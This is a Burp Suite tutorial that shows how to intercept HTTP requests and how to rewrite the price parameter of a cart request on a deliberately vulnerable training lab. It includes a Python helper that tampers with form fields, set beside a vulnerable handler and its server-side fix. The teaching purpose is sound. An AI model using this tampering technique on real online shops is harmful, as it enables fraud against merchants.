
2. Intercept HTTP traffic with Burp Proxy

  • Last updated: September 9, 2021

  • Read time: 4 Minutes

In this tutorial, you'll use a live, deliberately vulnerable website to learn how to intercept and modify HTTP requests with Burp Proxy.

Intercepting a request

Burp Proxy lets you intercept HTTP requests and responses sent between your browser and the target server. This enables you to study how the website behaves when you perform different actions.

Step 1: Launch Burp's embedded browser

Go to the Proxy > Intercept tab and click Open Browser. This launches Burp's embedded Chromium browser, which is preconfigured to work with Burp right out of the box.

Position the windows so that you can see both Burp and the browser.

Opening Burp Suite's embedded browser

Step 2: Intercept a request

In Burp, notice that the Intercept is on button is selected.

Intercept is on

Using the embedded browser, try to visit https://portswigger.net and observe that the site doesn't load. Burp Proxy has intercepted the HTTP request that was issued by the browser before it could reach the server. You can see this intercepted request on the Proxy > Intercept tab.

Viewing an intercepted request in Burp Proxy

The request is held here so that you can study it, and even modify it, before forwarding it to the target server.

Step 3: Forward the request

Click the Forward button several times to send the intercepted request, and any subsequent ones, until the page loads in the browser.

Step 4: Switch off interception

Due to the number of requests browsers typically send, you often won't want to intercept every single one of them. Click the Intercept is on button so that it now says Intercept is off.

Proxy Intercept is off

Go back to the embedded browser and confirm that you can now interact with the site as normal.

Step 5: View the HTTP history

In Burp, go to the Proxy > HTTP history tab. Here, you can see the history of all HTTP traffic that has passed through Burp Proxy, even while interception was switched off.

Click on any entry in the history to view the raw HTTP request, along with the corresponding response from the server.

Viewing the HTTP history in Burp Proxy

This lets you explore the website as normal and study the interactions between your browser and the server afterwards, which is more convenient in many cases.


Modifying requests in Burp Proxy

In this section, you'll learn how to modify an intercepted request in Burp Proxy. This enables you to manipulate the request in ways that the website isn't expecting, so that you can see how it responds. Using one of our deliberately vulnerable websites, known as "labs", you'll see how this can help you identify and exploit real vulnerabilities.

Web Security Academy

To follow along, you'll need an account on portswigger.net. If you don't have one already, registration is free and it grants you full access to the Web Security Academy.

Step 1: Access the vulnerable website in the embedded browser

In Burp, go to the Proxy > Intercept tab and make sure interception is switched off.

Launch the embedded browser and use it to access the following URL, logging in if prompted:

https://portswigger.net/users?returnurl=/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

When the page loads, click Access the lab to launch your own instance of a fake shopping website. This may take a few seconds to load.

Lab home page

Step 2: Log in to your shopping account

On the shopping website, click My account and log in using the following credentials:

Username: wiener

Password: peter

Notice that you have just $100 of store credit.

Step 3: Find something to buy

Click Home to go back to the home page. Select the option to view the product details for the Lightweight "l33t" leather jacket.

Step 4: Study the add to cart function

In Burp, go to the Proxy > Intercept tab and switch interception back on. In the browser, add the leather jacket to your cart to intercept the resulting POST /cart request.

Study the add to cart function

Note

You may initially see a different request on the Proxy > Intercept tab if your browser is doing something else in the background. In this case, just click Forward until you see the POST /cart request as shown in the screenshot above.

Study the intercepted request and notice that there is a parameter in the body called price, which matches the price of the item in cents.

Step 5: Modify the request

Change the value of the price parameter to 1 and click Forward to send the modified request to the server.

Changing the price parameter

Switch interception off again so that any subsequent requests can pass through Burp Proxy uninterrupted.
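What happens when you edit the body on the Intercept tab and click Forward, as an added Python example written for this page (it is not code from the tutorial or from Burp Suite itself): the request is split into headers and body, the price parameter is rewritten, and Content-Length is recomputed. Burp does that last step for you; a script that replays the request must do it itself, or the server reads a truncated or over-long body. The sample request is constructed: only the price parameter is described on this page, and the host, cookie and other parameter names are assumptions.

```python
from urllib.parse import parse_qsl, urlencode


def build_request(method, path, headers, body):
    """Serialise an HTTP/1.1 request; Content-Length is always derived from the body."""
    lines = [f"{method} {path} HTTP/1.1"]
    for name, value in headers:
        if name.lower() != "content-length":
            lines.append(f"{name}: {value}")
    lines.append(f"Content-Length: {len(body)}")
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def split_request(raw):
    """Split raw request bytes into (request line, [(header, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    head_lines = head.decode().split("\r\n")
    headers = []
    for line in head_lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return head_lines[0], headers, body


def content_length(raw):
    """Declared Content-Length of a raw request (the number of body bytes the server will read)."""
    _, headers, _ = split_request(raw)
    return int(next(v for n, v in headers if n.lower() == "content-length"))


def tamper_form_param(raw, name, new_value):
    """Rewrite one parameter of a form-encoded body and fix Content-Length.

    This is the edit you make by hand in Proxy > Intercept before clicking
    Forward. Parameters other than `name` are preserved in their original order.
    """
    request_line, headers, body = split_request(raw)
    ctype = next((v for n, v in headers if n.lower() == "content-type"), "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        raise ValueError(f"body is not form-encoded: {ctype!r}")
    params = parse_qsl(body.decode(), keep_blank_values=True)
    if all(k != name for k, _ in params):
        raise KeyError(f"no {name!r} parameter in body")
    params = [(k, new_value if k == name else v) for k, v in params]
    method, path, _ = request_line.split(" ", 2)
    # build_request drops the stale Content-Length and recomputes it from the new body.
    return build_request(method, path, headers, urlencode(params).encode())


# Constructed stand-in for the lab's "add to cart" request. The lab host, the
# session cookie and every field except `price` are assumptions for this example.
ORIGINAL = build_request("POST", "/cart", [
    ("Host", "YOUR-LAB-ID.web-security-academy.net"),
    ("Content-Type", "application/x-www-form-urlencoded"),
    ("Cookie", "session=constructed-session-token"),
], b"productId=1&redir=PRODUCT&quantity=1&price=133700")

# The same change you made on the Intercept tab: price=133700 becomes price=1.
TAMPERED = tamper_form_param(ORIGINAL, "price", "1")

if __name__ == "__main__":
    print(TAMPERED.decode())
```

The Content-Type check matters in practice: JSON bodies, multipart uploads and URL-encoded forms are all edited on the same Intercept tab, but only the last of these can be rewritten with parse_qsl and urlencode.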

Step 6: Exploit the vulnerability

In the embedded browser, click the basket icon in the upper-right corner to view your cart. Notice that the jacket has been added for just one cent.

Note

There is no way to modify the price via the web interface. You were only able to make this change because Burp Proxy let you edit the request after the browser had built it but before the server received it. Any value the browser sends can be altered in the same way, so a hidden or read-only form field is not a security control: the server must never trust it.
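The flaw behind this lab and its fix, as an added Python example written for this page (it is not the Web Security Academy's own server code): the vulnerable handler stores whatever price arrives in the request body, while the hardened one looks the price up from server-side state and bounds the quantity as well. The catalogue, the product id, the price in cents and the form-field names other than price are constructed for the example; the jacket's name and the $100 store credit are from this page.

```python
# Constructed catalogue standing in for the lab's product database.
CATALOG = {
    "1": {"name": 'Lightweight "l33t" leather jacket', "price_cents": 133700},
}
STORE_CREDIT_CENTS = 100_00  # the $100 of store credit on the wiener account


def cart_total(cart):
    return sum(item["quantity"] * item["price_cents"] for item in cart)


def add_to_cart_vulnerable(form, cart):
    """The logic flaw the lab demonstrates: the server stores the price the client sent.

    The HTML form never lets a user edit `price`, but the form is not a
    security control. Anything the browser sends can be rewritten in
    Proxy > Intercept before it reaches this code.
    """
    product = CATALOG[form["productId"]]
    cart.append({
        "name": product["name"],
        "quantity": int(form.get("quantity", "1")),
        "price_cents": int(form["price"]),      # attacker-controlled
    })
    return cart_total(cart)


def add_to_cart_fixed(form, cart):
    """Hardened handler: the client chooses what and how many, never the price.

    The price comes only from server-side state; a `price` field in the
    request is simply never read. Quantity is bounded too, because a zero
    or negative quantity is the next thing an attacker tries once the
    price stops working.
    """
    try:
        product = CATALOG[form["productId"]]
    except KeyError:
        raise ValueError("unknown productId") from None
    try:
        quantity = int(form.get("quantity", "1"))
    except ValueError:
        raise ValueError("quantity is not an integer") from None
    if not 1 <= quantity <= 99:
        raise ValueError("quantity out of range")
    cart.append({
        "name": product["name"],
        "quantity": quantity,
        "price_cents": product["price_cents"],  # server-side truth
    })
    return cart_total(cart)


def place_order(cart, credit_cents=STORE_CREDIT_CENTS):
    """Checkout succeeds only if the cart total fits within the store credit."""
    return cart_total(cart) <= credit_cents


# The tampered request from the tutorial, as the server sees its form fields.
TAMPERED_FORM = {"productId": "1", "redir": "PRODUCT", "quantity": "1", "price": "1"}

if __name__ == "__main__":
    cart = []
    print("vulnerable:", add_to_cart_vulnerable(TAMPERED_FORM, cart), place_order(cart))
    cart = []
    print("fixed:", add_to_cart_fixed(TAMPERED_FORM, cart), place_order(cart))
```

Against the tampered request the vulnerable handler prices the jacket at one cent and the order goes through on $100 of credit; the fixed handler prices it at 133700 cents regardless of what the client sent, and checkout fails.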

Click the Place order button to purchase the jacket for an extremely reasonable price.

Congratulations, you've just solved your first Web Security Academy lab! Along the way, you've learned how to intercept, review, and manipulate HTTP traffic using Burp Proxy.

Next step - Reissuing requests with Burp Repeater


In this tutorial

  1. Initial Installation
  2. Intercepting HTTP traffic with Burp Proxy
  3. Manually reissuing requests with Burp Repeater
  4. Running your first scan